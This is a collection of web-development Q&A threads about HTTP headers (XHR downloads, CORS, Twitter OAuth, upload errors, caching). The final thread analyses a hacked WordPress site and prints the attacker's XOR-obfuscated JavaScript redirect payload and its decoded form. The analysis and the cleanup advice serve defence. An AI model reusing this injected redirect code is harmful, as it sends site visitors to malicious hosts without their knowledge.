In my FCGI app I want to craft the server-side response so that the browser (ideally the majority of them) opens a "Save as" dialog box and saves the file to the user's hard drive.
So far I have failed to achieve this.
Here is the dump of request/response received from Chrome:
Remote Address:192.168.1.69:80
Request URL:http://192.168.1.69/sunprint/sunweb.fcgi?GETPCBSDATAASFILE2SAVE
Request Method:GET
Status Code:200 OK
Request Headers
GET /sunprint/sunweb.fcgi?GETPCBSDATAASFILE2SAVE HTTP/1.1
Host: 192.168.1.69
Connection: keep-alive
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Referer: http://192.168.1.69/sunprint/PCBsVersions.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Query String Parameters
GETPCBSDATAASFILE2SAVE
Response Headers
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 10:21:23 GMT
Server: Apache/2.2.22 (Ubuntu)
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Description: File Transfer
Content-Disposition: attachment; filename="SunSerialNumbers.txt"
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 227
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/plain
The content of my file is just a set of printable ASCII characters. BTW, should I encode the content in some way?
It seems that all the needed headers are present, but the browser still refuses to show the desired dialog box. Am I sending the wrong combination of headers?
To make the request I use the following code:
function sendCommandGetFile(url1) {
    $.ajax({
        url: url1,
        type: "GET"
    });
}

// note: the original call passed a callback as a second argument,
// but sendCommandGetFile takes no callback, so it was silently ignored
sendCommandGetFile("sunweb.fcgi?GETPCBSDATAASFILE2SAVE");
Thanks a lot for any help.
Your request includes:
X-Requested-With: XMLHttpRequest
No set of HTTP headers is going to cause the browser to download a file that it receives in response to an XHR request.
You have three basic options.
1. Don't use XHR in the first place.
2. Store the file data somewhere, give it a temporary URI, pass the URI back in the response, and have the client-side JS set location to that URI.
3. Construct a data: scheme URI and have the client-side JS assign it to location.
Unless you really need to sometimes return a file and sometimes return data for the JS to process (e.g. error messages), option 1 is the best.
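For instance, here is a minimal sketch of option 1, reusing the question's own URL and function name (the server-side headers can stay exactly as they are):

function sendCommandGetFile(url1) {
    // a plain navigation instead of an XHR; because the response carries
    // Content-Disposition: attachment, the browser shows the "Save as"
    // dialog and the current page stays in place
    window.location.href = url1;
}

sendCommandGetFile("sunweb.fcgi?GETPCBSDATAASFILE2SAVE");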
I have some working JavaScript (running in Firefox v41) which I need to modify to support cross-domain XMLHttpRequests (my POST requests retrieve JSON-encoded data). I have control over the server in question, so I capture OPTIONS requests and reply with:
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Content-Type, X-Requested-With
Access-Control-Max-Age: 86400
The browser then correctly sends the POST request, my server responds with the data, and that data arrives back at my machine; I can see it in Wireshark and it is well-formed JSON.
HOWEVER, the data doesn't reach my JavaScript. I can see in the Firefox window that the response to the POST request does arrive, with all the expected headers indicating (for example) 1120 bytes of content, but when I click on the "Response" tab there is nothing in it, only: SyntaxError: JSON.parse: unexpected end of data at line 1 column 1 of the JSON data. My JavaScript code ends up in the XMLHttpRequest's onerror function.
What do I need to do to get my data correctly? Any advice welcomed.
Here is a sample of one complete HTTP exchange, as seen by Wireshark on the browser machine:
OPTIONS /getAllData HTTP/1.1
Host: blah:blah
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: null
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Content-Type, X-Requested-With
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 86400
Date: Fri, 26 Aug 2016 09:22:14 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
test
POST /getAllData HTTP/1.1
Host: blah:blah
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/string; charset=UTF-8
Content-Length: 4
Origin: null
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Date: Fri, 26 Aug 2016 09:22:15 GMT
Content-Length: 1121
{"wellformed":"data 1121 bytes long"}
I have toyed with Access-Control-Allow-Origin, and the header needs to be present in each and every response sent to the client.
So, whenever you make that POST, the answer MUST include the ACAO header; otherwise the browser will filter out the content for security purposes. I do not see that header in the POST response of the capture you made, which might explain the issue.
You can take a look at the examples from Mozilla; you will see that the response to the POST does include the ACAO header.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
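Since you say you control the server, here is a minimal sketch of the idea in Node/Express (an assumption purely for illustration; the question doesn't say what the server runs, but the principle is the same everywhere): the CORS headers are attached to every response, including the POST, not only to the OPTIONS preflight.

const express = require("express");
const app = express();

// attach the CORS headers to *every* response, not only the preflight
app.use((req, res, next) => {
    res.setHeader("Access-Control-Allow-Origin", "*");
    res.setHeader("Access-Control-Allow-Methods", "GET, POST, OPTIONS");
    res.setHeader("Access-Control-Allow-Headers", "Content-Type, X-Requested-With");
    res.setHeader("Access-Control-Max-Age", "86400");
    if (req.method === "OPTIONS") {
        return res.sendStatus(200); // preflight handled here
    }
    next();
});

app.post("/getAllData", (req, res) => {
    // the ACAO header set above now accompanies this JSON response too
    res.json({ wellformed: "data" });
});

app.listen(8080);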
Also, it seems that your body content is not separated from the headers by the conventional empty line (\r\n in the HTTP protocol). The body seems to be part of the headers in your pastes, but it might just be a glitch in your copy-paste. If it's not, then it's also a potential explanation: no body = no content.
Finally, I recommend that you debug your traffic with a tool such as Burp Suite, which includes a nice proxy that lets you not only view and edit your requests in real time, but also replay them and experiment. Originally a security tool, it is still great for debugging web apps.
https://portswigger.net/burp/
I have no idea what's going on. I worked so hard to get the signature and header perfect. Everything is perfect. I compared it with the oauth tool here:
https://dev.twitter.com/oauth/tools/signature-generator/
However I keep getting:
status: 401
statusText: Unauthorized
response: {"errors":[{"code":32,"message":"Could not authenticate you."}]}
I read somewhere that it might be treated as a multipart POST, so I should not include the POST/query data in the signature. I tried that, but then I get a 403:
status: 403
statusText: Forbidden
response: {"errors":[{"code":170,"message":"Missing required parameter: status."}]}
Does anyone know what could possibly be going on? I don't know what code to share, because everything matches perfectly. I upgrade a request token to an access token with this same algorithm (though of course in that call the oauth_token_secret is not used). I also use the same exact method to upload a gif for attaching to a tweet, and it works perfectly; of course, the difference there is that the upload is multipart, so I don't include the POST data or query parameters in the signature base string.
I am, of course, generating a new header per request. And my token is an access token, not a request token.
Here are the headers for the tweet:
https://api.twitter.com/1.1/statuses/update.json
POST /1.1/statuses/update.json HTTP/1.1
Host: api.twitter.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: OAuth oauth_consumer_key="......", oauth_nonce="Cdo4tSOnRkOhxOAxMJWwjrnpB2qUYyjQXfnv5kes", oauth_signature="LyRDKV44MGYxCk3TNEm8lrCPUeg%3D", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1466330342", oauth_token="15......97-ivs............rPqXxBk", oauth_version="1.0"
Content-Length: 17
Content-Type: text/plain;charset=UTF-8
Cookie: ...........
Connection: keep-alive
status=Hellohiiii
HTTP/2.0 401 Unauthorized
Content-Encoding: gzip
Content-Length: 89
Content-Type: application/json; charset=utf-8
Date: Sun, 19 Jun 2016 09:58:52 GMT
Server: tsa_a
Strict-Transport-Security: max-age=631138519
x-connection-hash: 1db624e689db4dc937d06c68e7318aa9
x-response-time: 6
x-tsa-request-body-time: 1
X-Firefox-Spdy: h2
Does anyone have any ideas?
Edit:
Because the multipart form data submits fine, I suspect it is the POST data I am sending. When I posted the data I tried both with encodeURIComponent and without it. Neither had any effect; I still get 401. When building the signature I of course used the value without any encoding.
Wow, I had to set Content-Type: application/x-www-form-urlencoded in the headers... This should be made clearer in the documentation.
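For anyone hitting the same wall, a minimal sketch of the working request (plain XMLHttpRequest; oauthHeader is a placeholder for the OAuth Authorization header built exactly as before):

var xhr = new XMLHttpRequest();
xhr.open("POST", "https://api.twitter.com/1.1/statuses/update.json");
// the fix: without this, the body goes out as text/plain (as in the capture
// above), and the server presumably never parses the status parameter that
// the signature was computed over, hence "Could not authenticate you"
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Authorization", oauthHeader); // oauthHeader: built elsewhere, as before
xhr.send("status=" + encodeURIComponent("Hellohiiii"));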
I've been struggling with a strange problem when uploading big images to the server. I am using blueimp's file upload on the client, and the server is Rails 4 with CarrierWave for processing images (though it seems the request never even gets that far).
As long as the image is under roughly 1.2 MB, everything is OK. But as soon as the image is bigger than that, I get this response from the server instead of a normal one:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf8
X-Pow-Template: error_starting_application
Connection: keep-alive
Transfer-Encoding: chunked
According to development.log, the server reports a simple "Completed 201 Created in 1402ms" for the route defined in routes.rb (although no action is actually performed). The header sent to the server is:
POST /images HTTP/1.1
Host: mysite.dev
Connection: keep-alive
Content-Length: 1081439
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://mysite.dev
X-CSRF-Token: ynCLWDzF90l3BhmMcmxF+KCFiws3tnQiFAuWp+Buqcw=
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT5ZwwFlboJY4Cz7n
Referer: http://mysite.dev/images/new
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,ru;q=0.6
I don't really understand what I am doing wrong, since my client settings don't really differ much from the ones specified in Blueimp's demo:
url: "/images"
paramName: "image[image]"
type: "POST"
dataType: "json"
formData: ""
disableImageResize: false
acceptFileTypes: /(\.|\/)(gif|jpe?g|png)$/i
The code for the controller action is:
def create
  @image = Image.create image_params
  respond_with @image, layout: false
end
And in case of smaller files everything goes smoothly:
HTTP/1.1 201 Created
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-UA-Compatible: chrome=1
Location: http://mysite.dev/images/298
Content-Type: application/json; charset=utf-8
ETag: "410e24f50d02125716bfc46eb7850c1f"
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: 40e527d0-e16a-4a4e-a2e5-6124d8e639ff
X-Runtime: 1.533655
Connection: close
The header sent from the client is the same, so no difference here. I guess there could be some problems with my server configuration (not accepting big files), but I cannot find it.
Thank you for your help!
UPD: Found the reason; it was actually Pow that caused all the trouble (in hindsight, the X-Pow-Template header in the error response above was the clue). Everything works perfectly with the native server running.
On Firefox 12, when I consecutively request two resources with the same URI but different request headers (different Accept fields), the response is the cached response from the first request. The first request is a text/html request for the page, which is returned correctly; the second request looks like this:
The requested URL is http://localhost:8080/test/, with these headers:
Response Headers
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 29 Apr 2012 19:41:53 GMT
Server: Apache-Coyote/1.1
Request Headers
Accept: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
Cookie: JSESSIONID=DB75F9F730D72D040CB5781903B60E87
Host: localhost:8080
Referer: http://localhost:8080/test/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
X-Requested-With: XMLHttpRequest
Do you have any suggestions to avoid this problem? Thanks in advance.
If your server is sending different content based on different Accept headers, it should be sending "Vary: Accept" to tell caches that the Accept header needs to be part of the cache key. Is your server doing that?
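For illustration, a hedged sketch of that fix in Node/Express (an assumption purely for the example; the question's server is Apache-Coyote/Tomcat, but the principle is identical):

const express = require("express");
const app = express();

app.get("/test/", (req, res) => {
    // tell caches that the body varies with the Accept request header
    res.setHeader("Vary", "Accept");
    if (req.accepts(["html", "json"]) === "json") {
        res.json({ status: "ok" });
    } else {
        res.send("<p>the HTML page</p>");
    }
});

app.listen(8080);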
Use cache: false in the $.ajax({...}) params. This appends a timestamp parameter to the query string, so each request has a unique URL and never hits the cache.
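For example, using the URL from the question:

$.ajax({
    url: "http://localhost:8080/test/",
    dataType: "json", // sends Accept: application/json
    cache: false      // appends _=<timestamp> so the URL is always unique
});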
Use the following line to apply cache: false to all AJAX requests made using jQuery:
$.ajaxSetup({ cache: false });
See the jQuery documentation for more ajaxSetup options.
One of my friends has a website running WordPress (note that it is not a blog on Wordpress.com), and it has been hacked. He has to talk to the company that provided the site about restoring a backup; in the meantime, I'd like to know what happened, because I'm trying to learn about web security and this is a good opportunity.
The first thing I notice is that the web page appears without styling, even though there are CSS files referenced from the HTML. When I try to navigate to one of those files, I get redirected to a website named tonycar.com.
The WordPress version is 2.0.2, as I can see in the HTML: <meta name="generator" content="WordPress 2.0.2" />
So, it goes like this:
Request to http://myfriendwebsite.net/:
GET http://myfriendwebsite.net/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-IE
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: myfriendwebsite.net
Response:
HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 22:05:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.myfriendwebsite.net/wordpress/xmlrpc.php
Set-Cookie: bb2_screener_=1308607528+213.191.238.24; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
The response contains the HTML code. Now the web site tries to get the CSS files, this is what happens with the first for example:
Request:
GET http://www.myfriendwebsite.net/wordpress/wp-content/themes/myfriendwebsite/includes/core.css HTTP/1.1
Accept: text/css
Referer: http://myfriendwebsite.net/
Accept-Language: en-IE
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.myfriendwebsite.net
Connection: Keep-Alive
Cookie: bb2_screener_=1308607528+213.191.238.24
Response:
HTTP/1.1 302 Found
Date: Mon, 20 Jun 2011 22:05:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Location: http://tonycar.com/r/404.php?213.191.238.24
Content-Length: 402
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved here.</p>
<hr>
<address>Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.myfriendwebsite.net Port 80</address>
</body></html>
That makes a redirection to http://tonycar.com/r/404.php?213.191.238.24, and this is what happens:
Request:
GET http://tonycar.com/r/404.php?213.191.238.24 HTTP/1.1
Accept: text/css
Referer: http://myfriendwebsite.net/
Accept-Language: en-IE
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tonycar.com
Connection: Keep-Alive
Response
HTTP/1.1 302 Moved Temporarily
Date: Mon, 20 Jun 2011 22:05:42 GMT
Server: Apache
Set-Cookie: xxx=xxx; expires=Mon, 20-Jun-2011 23:05:42 GMT
Location: go.php?dd41dcd4bcb38e25c529f150f00ecf95
Content-Length: 0
Connection: close
Content-Type: text/html
A new redirection and finally:
Request
GET http://tonycar.com/r/go.php?dd41dcd4bcb38e25c529f150f00ecf95 HTTP/1.1
Accept: text/css
Referer: http://myfriendwebsite.net/
Accept-Language: en-IE
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tonycar.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 22:05:44 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2da
<script language=JavaScript>HaSyJGVMNHBHlTVzQCrn1 = "=rbshqu!uxqd<#udyu.k`w`rbshqu#?w`s!yyy<#iuuq;..099/338/81/76.hoedy/qiq>nbu0l<GD1RkCgHj1`NhvxLBXxWSiPY'OV6D<DVBWTJ#ycH1W[WBynVGSOS'6uj<106IVBH'ix<$3GY'nmQ<D5$3CYmyWUTu4J2['JwR2<Q1QFE7N00C8X1778NBXN9Q7B1E8'o3<l5sYRW#SGmeNh#uD'twff<$3CXDyfN2WJgj1KQmD5PmKJEUOx`o9#[f[1#2XNLUHvHf$2E$2E'07<0[R3F893K60'[Wh<BjHJh1rP#9tHDn#:enbtldou/mnb`uhno/isdg<yyy:=.rbshqu?";PIIupfVDlgksHCrQJMcW2 = "";for (TdeFxzFOBwBRFKLvqgyb3 = 0; TdeFxzFOBwBRFKLvqgyb3 < HaSyJGVMNHBHlTVzQCrn1.length; TdeFxzFOBwBRFKLvqgyb3 ++) { PIIupfVDlgksHCrQJMcW2 = PIIupfVDlgksHCrQJMcW2+ String.fromCharCode (HaSyJGVMNHBHlTVzQCrn1.charCodeAt (TdeFxzFOBwBRFKLvqgyb3) ^ 1); }; document.write (PIIupfVDlgksHCrQJMcW2);</script>
0
After a little bit of work, I found out that the evil JavaScript generates the following and writes it to the document:
<script type="text/javascript">
var xxx="http://188.229.90.67/index.php?oct1m=FE0SjBfIk0aOiwyMCYyVRhQX&NW7E=EWCVUKAxbI0VZVCxoWFRNR&7tk=017HWCI&hy=%2FX&olP=E4%2BXlxVTUt5K3Z&KvS3=P0PGD6O11B9Y0669OCYO8P6C0D9&n2=m4rXSVARFldOiAtE&uvgg=%2BYExgO3VKfk0JPlE4QlJKDTNyan8AZgZ0A3YOMTIwIg%3D%3D&16=1ZS2G982J71&ZVi=CkIKi0sQA8uIEo";
document.location.href=xxx;
</script>
Basically, it declares a string and then decodes it by XOR-ing each character code with 1:
var varA = "crazy encoded string"; // the obfuscated payload
var varB = "";
for (var varC = 0; varC < varA.length; varC++) {
    // flip the lowest bit of each character code to recover the original character
    varB = varB + String.fromCharCode(varA.charCodeAt(varC) ^ 1);
}
document.write(varB);
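For example, "iuuq;" in the encoded payload decodes to "http:" ("i", 0x69, XOR 1 gives "h", 0x68; "u" gives "t"; "q" gives "p"; ";" gives ":"), and the same bit flip turns "099/338/81/76" into "188.229.90.67", the IP address that appears in the decoded script above.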
So again, a new redirection, but I cannot see that request in Fiddler and I don't know why; maybe IE9 doesn't execute it? :S I cannot decode those query string parameters, probably because those are the intended names and values (or not).
What is the purpose of this hack? What are they trying to achieve?
How was this possible? I understand what an XSS attack is (direct, reflected, and DOM-based), but this has nothing to do with that. The server is returning a crafted response instead of the requested CSS file. CSS files are supposed to be static files that the web server returns without involving PHP or WordPress, so how is this happening?
This kind of thing is extremely common on WordPress sites, and you will see it on other popular web applications as well.
Basically, automated bots find a website to hijack, and try a few commonly known exploits. If one works, they embed some crap into your site, as you have seen.
What they do is create links to words that go back to their sites. This is to increase their page rank and what not with search engines. The idea is that if 50,000 broken WordPress sites have the word "Viagra" linked to "my-viagra-pharmacy.info", then Google will boost that site up when people search for "Viagra".
It happens all the time. A search through your PHP files for eval() will likely turn up a few "evil" (ha! a pun) lines of code.
I don't use WordPress, but I'm also interested in this.
Have you:
Identified any culprit .htaccess files?
Investigated mod_auth_passthrough / FrontPage?
There is some sort of internal redirect occurring, which means code is either being injected, a file has been added, or an existing file has been modified. The easiest way to find out would be to:
grep your files for some identifiable text, like tonycar.com (see the example commands after this list). As you pointed out, they may have obfuscated it, so you might need to use other locating techniques, such as...
sort files by modified dates and look at them manually/individually
use a file comparison tool and compare the possibly infected files to their uninfected backups
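A hedged sketch of those searches, assuming shell access with the WordPress root as the current directory:

# search every file for the attacker's domain and for suspicious eval() calls
grep -rn "tonycar" .
grep -rn "eval(" .

# list .php and .htaccess files by modification time, newest first
find . -name "*.php" -o -name ".htaccess" | xargs ls -lt | head -20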
Something that was noticed is that they are using cookie information (the bb2_screener_ cookie above); have you tried accessing the site with cookies disabled, to see whether that is a possible point of insecurity?
Great analysis of what happened. Search all your theme PHP files, and replace all WP core files/folders.
Who is the web host?
Also see "How to completely clean your hacked wordpress installation", "How to find a backdoor in a hacked WordPress", and "Hardening WordPress" in the WordPress Codex.
I don't know about the specifics of wordpress, but I'd investigate the actual file permissions first. To me it looks like someone was able to put a .htaccess in the wordpress/wp-content/themes/myfriendwebsite/includes/ directory. I can't easily think of another way to force a 302 redirect on what should be static content (a .css file). It actually strikes me as unlikely that an unauthorized user would be able to upload such a file to that directory. I think it more likely that someone else on the same server (I'm assuming it to be shared hosting) found that directory to be writable. Check the permissions on that directory and make sure it isn't writable by everyone on the system.
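A quick way to check, assuming shell access (the path is the one from the question):

# show the permissions on the directory itself
ls -ld wordpress/wp-content/themes/myfriendwebsite/includes/
# look for a rogue .htaccess while you're there
ls -la wordpress/wp-content/themes/myfriendwebsite/includes/
# if it turns out to be world-writable (drwxrwxrwx), drop the write bit for "other"
chmod o-w wordpress/wp-content/themes/myfriendwebsite/includes/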